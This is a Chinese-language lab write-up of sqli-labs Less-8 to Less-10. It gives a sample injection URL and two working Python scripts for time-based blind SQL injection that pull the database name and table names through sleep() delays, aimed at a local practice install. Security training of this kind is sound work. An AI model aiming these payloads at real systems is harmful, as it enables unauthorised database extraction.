漏洞学习

sqlilabs Less8~Less10 writeup

文章目录
  1. 1. Less-8
  2. 2. Less-9
  3. 3. Less-10

继续注入!

Less-8


Less-8做法和Less-5完全一样,加单引号绕过,还是盲注,这里可以参考之前的博客:

1
https://willardtm.github.io/2018/02/19/sqlilabs-Less-5~6/

Less-9


从Less-9的标题可以看出,Less-9是时间盲注,Less-6的时候有写过使用时间盲注的脚本,但是Less-9提升了一点难度,无论怎么都返回的是“You are in”,并且这里是单引号注入,所以这里需要对脚本进行相关修改。
首先对数据库长度进行测试:

1
http://localhost/sqli-labs-master/Less-9/?id=1' and If(length(database())=5,1,sleep(5))%23

F12查看元素发现时间为6.12s

当测试到数据库长度为8的时候,时间返回为1.10s,说明这里并没有进行延时,所以数据库长度为8。

写脚本的时候和Less-6比起来的改动只在于加入了一个time块来比较当前时间和运行时间的间隔,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python
#coding=utf-8

'''
Because sometimes some page will return the same content weather the input is different.
That's why I write this program to detect the right information.
'''

import requests
import time

def send_data(payload):
	r=requests.session()
	url="http://localhost/sqli-labs-master/Less-9/?id=1' "+payload
	start_time=time.time()
	r.post(url)
	if time.time()-start_time <5:
		#if time don't delay 5 seconds,which means right
		return True
	else:
		return False

def get_db_length():
	for i in range(0,20):
		payload="and if(length(database())="+str(i)+",1,sleep(5))%23"
		if(send_data(payload)):
			print "The length of databse is ",i
			return i

def get_db_name():
	chars=".1234567890_abcdefghijklmnopqrstuvwxyz@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
	result=""
	db_length=get_db_length()
	if db_length != None:
		for j in range(db_length+1):
			#Because the database's name count from number 1,length add 1.
			for char in chars:
				payload="and If(ascii(substr(database(),"+str(j)+",1))="+str(ord(char))+",1,sleep(5))%23"
				if(send_data(payload)):
					result+=char
					print result
					break
	print result

def main():
	get_db_name()

if __name__=="__main__":
	main()

之前好几次CTF比赛上都遇到了这类题目,但是由于当时确实不会这个东西而且嫌麻烦又不想学……脚本跑出来也相当费时…
好吧,继续,再列一次表,后面的操作大同小异而已。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python
#coding=utf-8

import requests
import time

def send_data(payload):
	r=requests.session()
	url="http://localhost/sqli-labs-master/Less-9/?id=1' "+payload
	start_time=time.time()
	r.post(url)
	if time.time()-start_time <5:
		#if time don't delay 5 seconds,which means right
		return True
	else:
		return False

def get_table_num():
	for i in range(0,20):
		payload="and if((select count(*) from information_schema.tables where table_schema=database())="+str(i)+",1,sleep(5))%23"
		if(send_data(payload)):
			print "The number of table is",i

def get_table_length(j):
	for i in range(0,20):
		payload="and if((select length(table_name) from information_schema.tables where table_schema=database() limit "+str(j)+",1)="+str(i)+",1,sleep(5))%23"
		if(send_data(payload)):
			print "The length of table is ",i
			return i

def get_db_name():
	chars=".1234567890@abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ"
	for i in range(0,20):
		result=""
		db_length=get_table_length(i)
		if db_length != None:
			for j in range(db_length+1):
				for char in chars:
					payload="and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(j)+",1))="+str(ord(char))+",1,sleep(5))%23"
					if(send_data(payload)):
						result+=char
						#print result
						break
		print result

def main():
	get_table_num()
	get_db_name()

if __name__=="__main__":
	main()

Less-10


Less-10也是基于时间的盲注,和Less-9的测试方法一样,都是查看元素,不过Less-10是加双引号绕过罢了。
脚本参考Less-9即可。